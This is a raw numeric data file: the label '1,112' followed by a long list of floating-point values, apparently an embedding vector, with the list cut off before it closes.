1,112
[ -0.049682386219501495, 0.015053795650601387, -0.014600074850022793, 0.020158149302005768, -0.017387215048074722, 0.03281370922923088, -0.015240144915878773, 0.05292324721813202, -0.033478084951639175, 0.004200965166091919, -0.01112425234168768, 0.016277220100164413, 0.023966161534190178, -0.032278966158628464, 0.002791190752759576, 0.009495720267295837, 0.001073534949682653, 0.01361161284148693, -0.010856881737709045, -0.017354806885123253, 0.032278966158628464, -0.024030977860093117, -0.030204815790057182, 0.05768731236457825, -0.012534026987850666, 0.009487617760896683, -0.018440494313836098, 0.00659920135512948, -0.013652123510837555, -0.010970311239361763, -0.005428440868854523, 0.0373995266854763, 0.0022503721993416548, 0.00919594056904316, 0.06656726449728012, -0.00790769886225462, 0.03752915933728218, 0.062062472105026245, 0.013287526555359364, -0.012469209730625153, -0.0031375577673316, -0.018035387620329857, -0.04219599813222885, -0.005254244431853294, -0.02775796689093113, 0.03623281791806221, -0.005193478427827358, 0.008620687760412693, -0.017743708565831184, -0.016131380572915077, -0.003935619723051786, -0.04517759010195732, -0.033964212983846664, -0.02479257993400097, 0.00608066376298666, -0.03445034474134445, 0.042844172567129135, -0.011359214782714844, -0.02082252688705921, 0.0242578387260437, -0.003088944824412465, 0.010824472643435001, -0.022929085418581963, 0.03065853752195835, -0.005509462207555771, 0.018991440534591675, -0.026639871299266815, 0.027498697862029076, 0.017306193709373474, 0.025359731167554855, -0.008361419662833214, -0.006133327726274729, -0.01584780588746071, 0.0035568440798670053, 0.048774946480989456, -0.04485350474715233, 0.04297380521893501, 0.03697821497917175, 0.012145123444497585, -0.010273526422679424, -0.04955275356769562, 0.000662350794300437, -0.018456699326634407, -0.013295629061758518, 0.014875547960400581, 0.011991182342171669, -0.011577973142266273, -0.07557685673236847, 0.012436800636351109, -0.018537720665335655, -0.01042746752500534, 0.025343526154756546, -0.01003046240657568, 0.002625096822157502, -0.04832122474908829, 0.03970053791999817, 0.003951823804527521, -0.005173223093152046, -0.023139741271734238, -0.008037333376705647, -0.04145060107111931, -0.0239175483584404, -0.01963961310684681, 0.01997990347445011, 0.033121589571237564, 0.0020265504717826843, 0.007004308979958296, 0.010111483745276928, 0.021665150299668312, 0.1344308853149414, 0.01595313474535942, 0.002007307717576623, -0.0011849395232275128, -0.01005476899445057, -0.01606656424701214, 0.005440594162791967, 0.005367674864828587, -0.03171181678771973, -0.02090354822576046, 0.009301268495619297, 0.025294912979006767, -0.021195225417613983, -0.010046666488051414, 0.008017078042030334, -0.013303730636835098, 0.0201257411390543, -0.028373731300234795, 0.007137994281947613, -0.0510435476899147, -0.04307103157043457, -0.02680191397666931, -0.03765879571437836, -0.021665150299668312, -0.021924419328570366, 0.03869587182998657, -0.007413467392325401, -0.04637670889496803, 0.02383652701973915, 0.010540897957980633, 0.0015951108653098345, -0.03338085860013962, -0.04336271062493324, 0.03872827813029289, 0.010962209664285183, 0.015256348997354507, 0.014357010833919048, 0.010127687826752663, -0.016463570296764374, -0.014802629128098488, 0.023123538121581078, -0.013870881870388985, -0.01957479491829872, 0.000824900169391185, 0.02429024688899517, 0.026639871299266815, -0.01785713993012905, -0.03720507398247719, -0.0019931290298700333, 0.000599052757024765, 0.0015019361162558198, -0.024079591035842896, -0.01383847277611494, 0.0017399367643520236, 0.005736322607845068, -0.023220762610435486, -0.022686021402478218, 0.04478868842124939, 0.01746823638677597, -0.026996364817023277, -0.0013490080600604415, -0.019915085285902023, -0.006408800836652517, 0.01112425234168768, 0.0663728192448616, -0.03710784763097763, -0.043751612305641174, 0.009471413679420948, 0.04809436574578285, -0.0048369839787483215, 0.004581766203045845, -0.03963571786880493, -0.04012184962630272, -0.017824731767177582, -0.032197944819927216, 0.043621975928545, -0.024484697729349136, 0.016884882003068924, -0.03158218041062355, 0.007482335902750492, -0.03662171959877014, 0.005598586052656174, 0.003362392308190465, 0.020158149302005768, -0.007555255200713873, -0.027903806418180466, 0.006603252608329058, -0.03294334188103676, -0.052307482808828354, 0.005092201754450798, 0.0350336991250515, -0.01216132752597332, -0.022523978725075722, -0.022767042741179466, -0.013409058563411236, -0.02897329069674015, -0.009795499965548515, 0.0060117957182228565, 0.04436737671494484, 0.016366343945264816, -0.02769315056502819, -0.035681869834661484, -0.042390450835227966, 0.018570128828287125, 0.022880472242832184, -0.0011099945986643434, -0.0010867009405046701, -0.02266981638967991, 0.004217169247567654, 0.02219989150762558, -0.017144151031970978, 0.03752915933728218, -0.02090354822576046, -0.005870007909834385, 0.017257580533623695, -0.0663728192448616, -0.013263219967484474, 0.0138951875269413, -0.018570128828287125, -0.053085289895534515, -0.014170660637319088, 0.04734896868467331, 0.0023253171239048243, 0.0068463170900940895, 0.021859601140022278, -0.03765879571437836, -0.004602021537721157, -0.03953849524259567, 0.011261989362537861, -0.00897718220949173, -0.02482498809695244, 0.00027142203180119395, 0.034709613770246506, -0.008191274479031563, -0.00008045182039495558, -0.01963961310684681, 0.04096447303891182, 0.017241375520825386, 0.015207736752927303, -0.001809817855246365, 0.006582997273653746, -0.029313579201698303, -0.03075576201081276, 0.013603510335087776, -0.025051848962903023, -0.04138578474521637, 0.011027026921510696, 0.008620687760412693, 0.015021386556327343, -0.0036155846901237965, -0.02811446227133274, 0.004237424582242966, 0.004946362692862749, -0.024808784946799278, -0.0046668387949466705, 0.010743451304733753, -0.027806580066680908, -0.0225725919008255, 0.010087177157402039, 0.03278129920363426, -0.051011137664318085, -0.008612586185336113, -0.026753300800919533, -0.038663461804389954, -0.0025440752506256104, 0.025894472375512123, -0.007867188192903996, 0.00037345848977565765, 0.007927954196929932, 0.0073405480943620205, 0.003741167951375246, 0.010792064480483532, -0.009325575083494186, -0.016982106491923332, -0.0021004825830459595, -0.02513287030160427, 0.03383458033204079, 0.026283375918865204, 0.01623670943081379, -0.051367633044719696, 0.02007712796330452, 0.00595508050173521, 0.027952419593930244, -0.01517532765865326, 0.00977929588407278, 0.03206831216812134, 0.011237682774662971, -0.00919594056904316, -0.029313579201698303, -0.007210914045572281, 0.006704529281705618, -0.0030241275671869516, 0.017289988696575165, 0.00373104028403759, -0.013157892040908337, -0.026299580931663513, -0.023771708831191063, -0.04822399839758873, 0.008798935450613499, 0.0037371169310063124, 0.0015059872530400753, 0.06258101016283035, -0.06112262234091759, 0.011448338627815247, -0.038955140858888626, 0.03146875277161598, -0.028033440932631493, 0.006915185134857893, -0.025943085551261902, -0.03872827813029289, -0.0012163353385403752, -0.028065849095582962, -0.005902416538447142, -0.011675198562443256, -0.001799690187908709, 0.008442441001534462, -0.019104870036244392, -0.01106753759086132, 0.017581665888428688, -0.07402124255895615, 0.021843397989869118, 0.015726273879408836, -0.02352864481508732, 0.0022382191382348537, -0.026348192244768143, 0.017743708565831184, -0.06582187116146088, -0.04271453619003296, 0.0145271560177207, 0.03545501083135605, -0.012971542775630951, -0.007652481086552143, -0.030609924346208572, 0.04021907597780228, -0.02169755846261978, 0.02006092481315136, 0.02437126822769642, 0.011156661435961723, -0.0009545345674268901, 0.03616799786686897, -0.013271322473883629, 0.0011049307649955153, 0.03665412962436676, 0.014859343878924847, 0.016933495178818703, 0.04559890180826187, 0.009398494847118855, -0.02651023678481579, -0.010314037092030048, 0.015483209863305092, -0.018553923815488815, 0.02607272006571293, -0.04521000012755394, 0.014146354980766773, 0.027417676523327827, 0.005343368276953697, 0.0050071291625499725, 0.0013064717641100287, -0.03445034474134445, -0.008507258258759975, -0.008377623744308949, -0.015361676923930645, 0.048774946480989456, -0.03882550448179245, -0.01637444645166397, -0.001971860881894827, 0.022410547360777855, 0.02054705284535885, 0.018116408959031105, -0.04640911892056465, 0.01835947297513485, -0.03279750421643257, 0.014851241372525692, 0.00942280050367117, -0.021843397989869118, -0.017776118591427803, 0.027855193242430687, -0.03409384936094284, 0.00874222069978714, 0.011999284848570824, -0.007401314564049244, -0.011529359966516495, 0.031031236052513123, -0.03759397938847542, -0.03675135597586632, -0.026591258123517036, 0.019347935914993286, -0.004520999733358622, -0.05123800039291382, 0.013263219967484474, -0.03445034474134445, 0.023690687492489815, -0.006360188126564026, 0.004699247423559427, 0.003822189522907138, -0.022912880405783653, 0.0476730540394783, -0.000669946544803679, -0.029540440067648888, 0.018229838460683823, -0.010743451304733753, 0.016147585585713387, 0.002256448846310377, -0.01408963929861784, -0.014438032172620296, 0.01787334308028221, 0.04089965671300888, 0.0015059872530400753, 0.007129892241209745, -0.060766126960515976, 0.017776118591427803, -0.011351112276315689, 0.006591099314391613, 0.0073202927596867085, 0.011245784349739552, 0.034871656447649, 0.014324601739645004, 0.00395384943112731, 0.012007386423647404, 0.0006815933738835156, 0.00028534760349430144, 0.00012229183630552143, -0.03973294422030449, 0.000427641614805907, -0.011140456423163414, -0.014745913445949554, 0.0015171276172623038, -0.050103697925806046, -0.02348003163933754, -0.02385273016989231, 0.01000615581870079, -0.03331604227423668, 0.037723612040281296, 0.02255638688802719, 0.005359572358429432, 0.04005703330039978, -0.004897749982774258, -0.05545111745595932, -0.03145254775881767, 0.016261015087366104, -0.019931290298700333, -0.03876068815588951, 0.045080363750457764, 0.012347676791250706, -0.03441793471574783, 0.0008907301817089319, -0.014916058629751205, -0.04449700936675072, -0.022394344210624695, 0.03581150621175766, 0.0006871636142022908, -0.007822626270353794, 0.029232557862997055, 0.026088925078511238, 0.00983601063489914, 0.031209483742713928, 0.020660484209656715, 0.040348708629608154, -0.011229580268263817, 0.013481978327035904, -0.01925070956349373, -0.003038306487724185, -0.022961493581533432, 0.0012355779763311148, 0.037334710359573364, -0.031015031039714813, 0.01788954809308052, -0.028389934450387955, -0.0006426018080674112, 0.01787334308028221, -0.05742804333567619, 0.0005281589110381901, -0.013708838261663914, 0.009981849230825901, 0.01916968822479248, -0.014591973274946213, -0.004723553545773029, 0.020174354314804077, -0.02309112809598446, -0.04213118180632591, -0.004832932725548744, 0.008904263377189636, -0.008154814131557941, -0.001098854118026793, -0.009074408560991287, -0.004488591104745865, -0.004253629129379988, -0.0009661814547143877, 0.010613816790282726, 0.019088666886091232, -0.011164763011038303, 0.023188354447484016, -0.0302372258156538, 0.02172996662557125, 0.008458645083010197, 0.009989951737225056, -0.014754015952348709, 0.003779653226956725, 0.032197944819927216, -0.029345989227294922, -0.05412236601114273, -0.04653875157237053, 0.029508031904697418, -0.014041027054190636, -0.016787655651569366, -0.002926901914179325, 0.001885775476694107, 0.004687094129621983, 0.0046303789131343365, 0.01322270929813385, 0.021908214315772057, 0.0027243481017649174, -0.011018924415111542, 0.010500387288630009, 0.012850010767579079, -0.005687709432095289, 0.009374188259243965, 0.016787655651569366, 0.0045696129091084, -0.0005950016784481704, -0.026267170906066895, -0.019331730902194977, 0.005699862726032734, -0.0046465834602713585, 0.007243322674185038, -0.036945804953575134, -0.006591099314391613, 0.0007879341137595475, 0.049325890839099884, 0.008114303462207317, 0.020206762477755547, -0.008936671540141106, 0.016179993748664856, -0.013084973208606243, 0.026607461273670197, -0.012007386423647404, 0.03315399959683418, -0.01881319284439087, 0.009179736487567425, -0.023334193974733353, -0.047089699655771255, 0.014243580400943756, -0.02138967625796795, 0.032667871564626694, 0.04909903183579445, 0.002546100877225399, 0.012623149901628494, 0.04696006327867508, 0.004901800770312548, 0.025943085551261902, 0.013230811804533005, 0.007494489196687937, -0.0011748118558898568, 0.005626943428069353, -0.011812935583293438, -0.008960978128015995, -0.006420954130589962, -0.01869976334273815, 0.0033745456021279097, -0.03425589203834534, -0.022523978725075722, 0.004687094129621983, -0.011391623876988888, 0.005055741872638464, 0.0011869650334119797, 0.01218563411384821, 0.011877752840518951, 0.015523720532655716, -0.023317988961935043, -0.04854808375239372, -0.022280912846326828, -0.003911313135176897, -0.030901601538062096, 0.007251424714922905, 0.03161459043622017, 0.010322139598429203, -0.00917163398116827, 0.0003970053803641349, 0.0030180509202182293, 0.009455209597945213, -0.013141687959432602, -0.006169787608087063, 0.015094306319952011, -0.0082966024056077, -0.008434338495135307, 0.005003077909350395, 0.0018543796613812447, -0.008823242038488388, 0.014138252474367619, 0.010792064480483532, -0.004172607325017452, -0.010613816790282726, 0.035163331776857376, -0.00521373376250267, -0.04005703330039978, -0.01920209638774395, 0.0064857713878154755, 0.009941338561475277, 0.04977961257100105, -0.04089965671300888, 0.01704692468047142, -0.03914958983659744, 0.040705204010009766, 0.06588668376207352, 0.00008969333430286497, 0.004225271288305521, -0.0006775423535145819, 0.03892273083329201, 0.012299064546823502, -0.0020143971778452396, 0.024808784946799278, 0.04102928936481476, -0.03239239752292633, 0.009827908128499985, -0.02469535358250141, -0.007498539984226227, 0.04313584789633751, 0.01386277936398983, -0.02213507518172264, -0.011229580268263817, -0.03464479371905327, -0.03198729082942009, 0.007903647609055042, -0.01425168290734291, -0.04300621524453163, -0.0036054570227861404, 0.019882677122950554, -0.0015718172071501613, 0.004873443394899368, -0.007478284649550915, 0.005712016019970179, -0.020287783816456795, 0.024922214448451996, -0.0073405480943620205, 0.022070256993174553, -0.02467915043234825, 0.010046666488051414, 0.0191210750490427, 0.019931290298700333, 0.01495656929910183, 0.023220762610435486, -0.004776217509061098, 0.013206505216658115, 0.0024103897158056498, 0.029702482745051384, 0.023188354447484016, -0.0269477516412735, 0.03726989030838013, 0.015102407895028591, 0.008280397392809391, -0.005898365285247564, -0.02521389164030552, -0.04874253645539284, -0.010986516252160072, -0.03331604227423668, 0.011383521370589733, 0.003771550953388214, 0.015928827226161957, 0.018051590770483017, -0.0033542902674525976, 0.02725563384592533, -0.004678991623222828, -0.014567666687071323, 0.03376976400613785, 0.005173223093152046, -0.021405881270766258, -0.004950413946062326, 0.01321460772305727, -0.018959032371640205, -0.0009965645149350166, -0.004541255068033934, -0.007494489196687937, -0.020644279196858406, -0.019785450771450996, 0.006631609983742237, 0.025764837861061096, -0.0007722362061031163, 0.0003889032232109457, -0.011278193444013596, -0.03033445030450821, 0.012290962040424347, 0.01109184417873621, 0.012485413812100887, 0.014591973274946213, 0.030480289831757545, -0.007903647609055042, -0.010022359900176525, 0.004073356278240681, -0.008815139532089233, -0.024030977860093117, -0.016512181609869003, -0.023204559460282326, -0.010467978194355965, 0.005764679983258247, -0.021648945286870003, -0.02169755846261978, 0.013498182408511639, -0.014170660637319088, -0.014867446385324001, -0.018100203946232796, 0.004269833210855722, 0.00704481964930892, 0.008588279597461224, 0.005922671873122454, 0.020287783816456795, 0.03509851545095444, -0.03035065531730652, 0.0033644179347902536, -0.036880988627672195, -0.03373735398054123, -0.014429929666221142, 0.01741962321102619, -0.02386893518269062, 0.014810730703175068, -0.028049644082784653, -0.00012260832590982318, 0.002296959748491645, 0.012841908261179924, 0.004012589808553457, 0.0011312627466395497, 0.006510077975690365, -0.011083741672337055, -0.03483924642205238, 0.017225172370672226, 0.015637150034308434, -0.0034454395063221455, 0.018651150166988373, 0.017306193709373474, -0.002438747324049473, 0.01322270929813385, 0.03143634274601936, -0.004423774313181639, -0.011529359966516495, 0.02001231163740158, -0.004225271288305521, -0.02218368835747242, -0.03279750421643257, 0.018002977594733238, 0.005051690619438887, -0.006886827759444714, 0.001459399820305407, -0.006903032306581736, 0.017727505415678024, 0.022734634578227997, -0.006975951604545116, -0.03357531130313873, 0.015961235389113426, 0.03752915933728218, -0.01615568809211254, 0.002667633118107915, 0.005732271354645491, 0.009406596422195435, -0.008081895299255848, 0.0032226303592324257, -0.03206831216812134, 0.022686021402478218, 0.00010437848686706275, -0.02129245176911354, -0.0028965186793357134, 0.011367317289113998, 0.007579561788588762, -0.006368290167301893, 0.01319030113518238, -0.025068053975701332, -0.016147585585713387, 0.008798935450613499, -0.003921440802514553, 0.007474233862012625, 0.012282859534025192, 0.01276898942887783, 0.0038789045065641403, -0.042844172567129135, 0.010370752774178982, -0.002258474472910166, 0.026575053110718727, 0.005396032240241766, 0.0063723414205014706, 0.013878983445465565, 0.019056256860494614, -0.004049049690365791, -0.009925134479999542, -0.004105764906853437, -0.020611871033906937, 0.03182524815201759, -0.010832575149834156, 0.0071704029105603695, -0.014519053511321545, -0.0028863910119980574, 0.030934009701013565, -0.01913728006184101, -0.012704172171652317, 0.030998827889561653, 0.004561510868370533, -0.028487160801887512, -0.029734892770648003, -0.028244096785783768, -0.016285322606563568, -0.02168135531246662, -0.012007386423647404, -0.04388124495744705, 0.03496888279914856, -0.004966618027538061, -0.020838730037212372, -0.0037350913044065237, -0.02339901030063629, -0.0030362808611243963, -0.007692991755902767, 0.04647393524646759, -0.03412625566124916, -0.022507773712277412, 0.034385524690151215, -0.0027243481017649174, -0.004755962174385786, 0.02219989150762558, -0.03613559156656265, -0.0008937684469856322, -0.039408858865499496, 0.013263219967484474, 0.0013429314130917192, 0.013328037224709988, 0.021648945286870003, -0.013514386489987373, 0.020628074184060097, -0.005942927207797766, 0.0004980290541425347, -0.000011623104001046158, 0.026105128228664398, -0.008993387222290039, 0.00726762879639864, -0.016350138932466507, 0.01699831150472164, -0.005833548493683338, -0.019509978592395782, -0.0035548184532672167, -0.0382421500980854, -0.019834063947200775, 0.0007545127300545573, -0.007024564314633608, -0.03341326862573624, 0.0024144407361745834, 0.006307524163275957, 0.011002720333635807, 0.035130925476551056, 0.028843656182289124, 0.03457997739315033, -0.03031824715435505, -0.016026053577661514, 0.005047639831900597, 0.023544849827885628, 0.005509462207555771, -0.012282859534025192, 0.013903290033340454, 0.00746613135561347, -0.016115177422761917, -0.01344146765768528, 0.014008617959916592, 0.028811246156692505, -0.006339932791888714, -0.03833937644958496, 0.012696069665253162, -0.021648945286870003, -0.02688293531537056, -0.028406139463186264, -0.0030950214713811874, 0.006311574950814247, 0.021503107622265816, -0.03062612935900688, -0.001385467709042132, -0.01324701588600874, -0.001670055789873004, 0.026218559592962265, 0.01218563411384821, 0.009447107091546059, -0.03931163251399994, 0.008098099380731583, -0.02735286019742489, -0.028697816655039787, 0.00427793525159359, -0.030561311170458794, -0.01106753759086132, -0.011731913313269615, 0.005833548493683338, 0.006117123644798994, -0.04018666595220566, 0.0003810542693827301, 0.03033445030450821, 0.014016720466315746, 0.008636892773211002, -0.03171181678771973, 0.0016730941133573651, -0.0026959904935210943, -0.004379212390631437, -0.001403697533532977, -0.005412236321717501, -0.0037958575412631035, -0.002566356211900711, -0.03159838542342186, 0.029119128361344337, 0.015029489062726498, -0.014405623078346252, -0.005578330717980862, -0.00011317691678414121, 0.005400083027780056, 0.01957479491829872, -0.016965903341770172, -0.021179020404815674, -0.03509851545095444, -0.04183950647711754, -0.005606688093394041, -0.0023334193974733353, 0.050103697925806046, -0.02853577397763729, 0.009260757826268673, -0.0036034313961863518, 0.0039963857270777225, 0.012064102105796337, -0.008572075515985489, -0.014462338760495186, -0.006587048061192036, -0.006907083094120026, 0.008231785148382187, 0.012371983379125595, -0.014486645348370075, -0.01324701588600874, -0.01084067765623331, -0.010281628929078579, -0.006019897758960724, -0.021179020404815674, -0.0119587741792202, -0.0027142204344272614, -0.037334710359573364, -0.009957542642951012, -0.008928569965064526, 0.007024564314633608, 0.011440236121416092, -0.013425263576209545, 0.022686021402478218, 0.0023719044402241707, -0.01451095100492239, -0.029589053243398666, -0.02605651505291462, -0.01999610662460327, -0.018537720665335655, -0.011569870635867119, -0.03145254775881767, -0.030966419726610184, 0.0021754272747784853, -0.022070256993174553, -0.0153697794303298, -0.0007727426127530634, 0.04896939545869827, 0.030042773112654686, 0.012914828024804592, -0.03451516106724739, -0.013773655518889427, 0.0041199433617293835, 0.004691144917160273, 0.012218043208122253, 0.013943800702691078, -0.008175069466233253, -0.014316500164568424, 0.006874674465507269, -0.02519768849015236, -0.004010564647614956, 0.01593692973256111, 0.011829139664769173, 0.048807352781295776, -0.025910677388310432, -0.05165931209921837, -0.012315268628299236, 0.0029734892304986715, -0.021130409091711044, -0.011391623876988888, 0.030788172036409378, -0.006672120653092861, -0.010937903076410294, -0.012623149901628494, -0.026542644947767258, 0.013287526555359364, 0.024209225550293922, 0.00469519617035985, 0.007595765870064497, -0.0076808384619653225, 0.0104841822758317, -0.02685052715241909, 0.025732429698109627, 0.0027932163793593645, -0.0010066921822726727, -0.039927396923303604, -0.0009322536643594503, -0.03331604227423668, -0.045404449105262756, 0.005906467791646719, -0.006518180016428232, 0.008320908062160015, 0.004217169247567654, 0.01746823638677597, 0.005379827693104744, 0.007603868376463652, -0.021519310772418976, -0.0033137795981019735, -0.04060797765851021, -0.008130507543683052, -0.004164505284279585, -0.018489107489585876, -0.0174358282238245, -0.02043362334370613, -0.01959099993109703, 0.031241891905665398, 0.0315011590719223, 0.03791806474328041, -0.004468335770070553, 0.04819159209728241, -0.016917290166020393, 0.015005182474851608, 0.020741505548357964, 0.0256027951836586, 0.007992771454155445, -0.014997079968452454, 0.0027162458281964064, 0.03244100883603096, 0.014211172237992287, 0.0032125026918947697, -0.010095279663801193, 0.02390134334564209, 0.002264551119878888, -0.004083483945578337, 0.005023333244025707, -0.002839803695678711, -0.025829656049609184, 0.01277709100395441, 0.04038111865520477, -0.007810472976416349, -0.023966161534190178, -0.010921698994934559, 0.013757451437413692, -0.008628790266811848, -0.00803328212350607, -0.001553587382659316, 0.005412236321717501, -0.014486645348370075, 0.0323437862098217, -0.02040121518075466, 0.062127288430929184, -0.02733665518462658, -0.013716940768063068, -0.00007298264972632751, 0.008337113074958324, -0.0021430188789963722, 0.01235577929764986, -0.01873217150568962, -0.013927596621215343, -0.03801529109477997, 0.01918589137494564, -0.011310601606965065, -0.008401930332183838, -0.019104870036244392, -0.022037848830223083, 0.018100203946232796, -0.01665802113711834, 0.012072203680872917, 0.0017571538919582963, 0.006218400318175554, -0.02053084969520569, -0.008993387222290039, 0.009690172038972378, -0.003793831914663315, 0.0012112715048715472, 0.00304033188149333, -0.016755247488617897, -0.006210298277437687, -0.029767300933599472, -0.05091391131281853, -0.025781042873859406, -0.030577516183257103, -0.04738137498497963, -0.011464542709290981, -0.007214964833110571, -0.017257580533623695, 0.023739300668239594, 0.0027547311037778854, -0.02219989150762558, -0.013206505216658115, 0.0008355342433787882, -0.032635461539030075, -0.024889806285500526, -0.00640069879591465, 0.013376650400459766, 0.10390197485685349, 0.024662945419549942, -0.019331730902194977, 0.007162300869822502, -0.005967233795672655, 0.009690172038972378, 0.014664892107248306, 0.009981849230825901, 0.019915085285902023, -0.00026053478359244764, 0.03376976400613785, -0.009860317222774029, 0.009981849230825901, 0.0020579462870955467, -0.007705145049840212, -0.00852346234023571, -0.02602410688996315, -0.011156661435961723, -0.014462338760495186, 0.012898623012006283, -0.006056357640773058, 0.010395059362053871, -0.004585816990584135, -0.015353575348854065, 0.004634430166333914, -0.014454236254096031, -0.0034231585450470448, -0.022945290431380272, -0.030139999464154243, -0.017776118591427803, 0.01493226271122694, -0.05201580375432968, -0.02482498809695244, 0.011869650334119797, 0.0058416505344212055, 0.024225430563092232, 0.013409058563411236, 0.0201257411390543, 0.00036636911681853235, -0.006230553612112999, -0.0032752943225204945, 0.014583870768547058, -0.011375418864190578, -0.0182784516364336, 0.0004223245778121054, -0.0021592231933027506, 0.02686673030257225, 0.005225887056440115, -0.02006092481315136, -0.012209940701723099, -0.012542128562927246, 0.004909903276711702, 0.007061024196445942, 0.029264967888593674, -0.006898981053382158, 0.015604741871356964, -0.03697821497917175, 0.002799293026328087, 0.01750064454972744, -0.013765553943812847, 0.008734118193387985, -0.006785551086068153, -0.017840934917330742, 0.014373214915394783, -0.001258871634490788, -0.024889806285500526, -0.007968464866280556, 0.022297117859125137, -0.002537998603656888, 0.027174612507224083, 0.0029856425244361162, -0.013538693077862263, -0.007182556204497814, 0.0036074824165552855, -0.0039862580597400665, 0.025700021535158157, -0.010241118259727955, -0.004049049690365791, -0.0037148359697312117, -0.0012386161834001541, 0.01241249404847622, 0.02941080555319786, 0.0024833090137690306, 0.025278709828853607, 0.00427793525159359, 0.03445034474134445, -0.013182198628783226, 0.005428440868854523, -0.007628174498677254, -0.021892011165618896, 0.003269217675551772, 0.009933236055076122, 0.02135726809501648, 0.008734118193387985, 0.01869976334273815, -0.004363007843494415, -0.004662787541747093, -0.03464479371905327, -0.01495656929910183, -0.0036155846901237965, 0.012331472709774971, -0.00037548402906395495, 0.020773913711309433, -0.0023800067137926817, -0.0340290330350399, 0.012623149901628494, 0.006125225685536861, 0.015110510401427746, -0.003117302432656288, 0.0016771451337262988, -0.043719202280044556, -0.0003007923369295895, 0.02087114006280899, -0.021940622478723526, -0.022799450904130936, 0.010735349729657173, 0.012720376253128052, 0.018926624208688736, 0.00785098411142826, -0.018505310639739037, -0.0007550191367045045, 0.0039862580597400665, 0.03801529109477997, 0.012388188391923904, -0.011845343746244907, -0.000659818877466023, 0.012363881804049015, -0.019088666886091232, 0.029994159936904907, 0.026105128228664398, 0.014745913445949554, 0.02941080555319786, 0.008636892773211002, -0.009155429899692535, 0.02988073043525219, -0.012939134612679482, 0.04038111865520477, 0.0006228528218343854, 0.026105128228664398, -0.008231785148382187, -0.014186865650117397, 0.02683432213962078, -0.0043265484273433685, 0.011885854415595531, -0.007992771454155445, -0.006684273947030306, -0.011950671672821045, 0.015556128695607185, 0.006886827759444714, 0.014867446385324001, -0.005391980987042189, -0.015961235389113426, 0.012841908261179924, 0.028260299935936928, 0.012120816856622696, 0.008985284715890884, 0.019850268959999084, -0.0015900470316410065, -0.004099688027054071, 0.004687094129621983, 0.0066761719062924385, -0.0004967630957253277, 0.018229838460683823, -0.012817601673305035, -0.0043062930926680565, 0.02947562374174595, 0.010184403508901596, -0.016479773446917534, -0.025862064212560654, -0.0012821652926504612, 0.03620040789246559, 0.0022240402176976204, -0.004751911386847496, 0.014648688025772572, 0.027109794318675995, 0.017808526754379272, -0.023107333108782768, 0.002260499866679311, 0.021162817254662514, -0.016949698328971863, -0.014559564180672169, 0.019461365416646004, 0.0007504616514779627, 0.013708838261663914, 0.021146612241864204, -0.01704692468047142, 0.021049385890364647, -0.0021126356441527605, -0.03062612935900688, -0.00914732739329338, 0.0012720376253128052, 0.017646484076976776, -0.012112715281546116, -0.012404392473399639, -0.022815655916929245, -0.0028661356773227453, 0.007575510535389185, -0.00916353240609169, 0.003443413879722357, 0.0033198560122400522, -0.02087114006280899, -0.012655558995902538, -0.029540440067648888, 0.01045177411288023, -0.0027304247487336397, -0.02991313859820366, 0.020206762477755547, 0.015410290099680424, -0.002677760785445571, -0.010621919296681881, -0.011326806619763374, -0.0020923803094774485, -0.0018027285113930702, -0.002319240476936102, 0.01642305962741375, 0.012039795517921448, -0.003968028351664543, -0.01492416113615036, -0.015442698262631893, 0.012209940701723099, -0.013498182408511639, 0.006842265836894512, -0.0046668387949466705, -0.0015829576877877116, -0.009989951737225056, -0.019477570429444313, 0.036070775240659714, -0.01064622588455677, -0.0058457013219594955, 0.015491311438381672, -0.01712794601917267, 0.010638123378157616, 0.020790118724107742, 0.018035387620329857, -0.0005651249666698277, -0.032197944819927216, 0.008588279597461224, -0.007182556204497814, -0.007956312038004398, -0.0021754272747784853, 0.008920467458665371, -0.004030819982290268, -0.0009018706041388214, 0.008426235988736153, -0.004038922023028135, -0.00023597512335982174, -0.003273268695920706, 0.01299584936350584, -0.01153746247291565, 0.014640585519373417, 0.0017986773746088147, -0.0017450005980208516, 0.0011950671905651689, 0.0017551283817738295, -0.01047608070075512, 0.03837178274989128, -0.0023597513791173697, -0.011027026921510696, 0.012517821975052357, -0.0151186129078269, 0.02605651505291462, 0.005424389615654945, 0.000028974682209081948, 0.002537998603656888, -0.027142204344272614, 0.03415866568684578, -0.00437111034989357, -0.005108405835926533, 0.0024529260117560625, -0.036945804953575134, 0.012817601673305035, 0.004081458318978548, 0.023593461140990257, 0.0014654764672741294, -0.0033239072654396296, 0.018570128828287125, -0.016965903341770172, -0.002645352156832814, -0.01489985454827547, 0.005420338828116655, 0.0019040053011849523, 0.027920009568333626, -0.0035852014552801847, -0.027433881536126137, -0.026137536391615868, -0.015864010900259018, -0.015029489062726498, 0.006384494714438915, -0.006348034832626581, 0.005724169313907623, 0.007295986637473106, 0.003119327826425433, 0.01750064454972744, -0.017743708565831184, 0.0061859916895627975, 0.009236451238393784, -0.0007570447050966322, 0.05512703210115433, -0.0016619536327198148, -0.008004924282431602, 0.0003233264433220029, 0.020741505548357964, 0.011691402643918991, 0.012250451371073723, 0.001218360848724842, 0.0010066921822726727, 0.001383442198857665, -0.017630279064178467, 0.0007221041596494615, -0.017727505415678024, 0.0444646030664444, -0.02044982835650444, -0.014227376319468021, 0.009155429899692535, 0.006773397792130709, -0.012031693011522293, -0.025343526154756546, 0.008847548626363277, -0.006870623677968979, -0.001641698181629181, 0.014421828091144562, 0.027871398255228996, -0.017208967357873917, -0.01618809625506401, 0.0019080564379692078, 0.012841908261179924, 0.009682069532573223, 0.006971900351345539, -0.010694838128983974, -0.014494746923446655, 0.02135726809501648, -0.006894929800182581, 0.01090549398213625, 0.007393212057650089, -0.008758424781262875, -0.010711043141782284, -0.006988104898482561, 0.012177531607449055, -0.009520026855170727, -0.01664181612432003, -0.017986774444580078, 0.015134816989302635, -0.001730821910314262, -0.004553408361971378, -0.012388188391923904, -0.025278709828853607, 0.016949698328971863, -0.0021652996074408293, 0.030042773112654686, -0.02892467752099037, -0.03707544133067131, 0.0014330678386613727, -0.0039700535126030445, 0.017241375520825386, 0.006437158677726984, 0.005420338828116655, 0.022718429565429688, -0.007834779098629951, 0.026137536391615868, -0.011456440202891827, -0.012177531607449055, -0.0039396705105900764, -0.025068053975701332, -0.017354806885123253, 0.001738924067467451, 0.02513287030160427, -0.019542386755347252, 0.0003144647052977234, -0.006218400318175554, 0.002416466362774372, 0.011132354848086834, -0.006688325200229883, -0.018165020272135735, 0.006514128763228655, -0.013765553943812847, 0.019428957253694534, 0.028811246156692505, -0.03448275104165077, 0.0018138688756152987, 0.032214149832725525, -0.0005489207105711102, -0.013117381371557713, 0.011399725452065468, 